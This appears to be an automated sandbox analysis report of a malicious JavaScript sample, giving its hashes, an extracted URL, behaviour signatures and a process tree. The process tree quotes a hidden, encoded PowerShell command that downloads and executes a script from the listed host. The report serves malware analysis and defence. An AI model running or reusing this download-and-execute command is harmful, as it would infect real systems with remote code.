Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
25-12-2023 15:17
Static task
static1
Behavioral task
behavioral1
Sample
28a527cbd650bf3317c7a1e4a1f49cb0.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
28a527cbd650bf3317c7a1e4a1f49cb0.js
Resource
win10v2004-20231215-en
General
-
Target
28a527cbd650bf3317c7a1e4a1f49cb0.js
-
Size
65KB
-
MD5
28a527cbd650bf3317c7a1e4a1f49cb0
-
SHA1
771ed820c33b3cfa083c9a42793eefde5e944682
-
SHA256
d5a3d06ac6a8c9adc98332a6d6318f4c8975d3993554fdb9bbcf17ab4aa57d10
-
SHA512
3711abaf9599af9eb301deaad641939b2820c8888b63dbbb0343050f71dae649130609d288c142249a96647578b5001e915791efdfa65d43b5f79f9ab6ef7ae4
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/o9:59Ry98guHVBqqg2bcruzUHmLKeMMU7Gn
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2804 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2804 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2804 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1740 wrote to memory of 2668 1740 wscript.exe 28 PID 1740 wrote to memory of 2668 1740 wscript.exe 28 PID 1740 wrote to memory of 2668 1740 wscript.exe 28 PID 2668 wrote to memory of 2804 2668 cmd.exe 30 PID 2668 wrote to memory of 2804 2668 cmd.exe 30 PID 2668 wrote to memory of 2804 2668 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28a527cbd650bf3317c7a1e4a1f49cb0.js1⤵
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-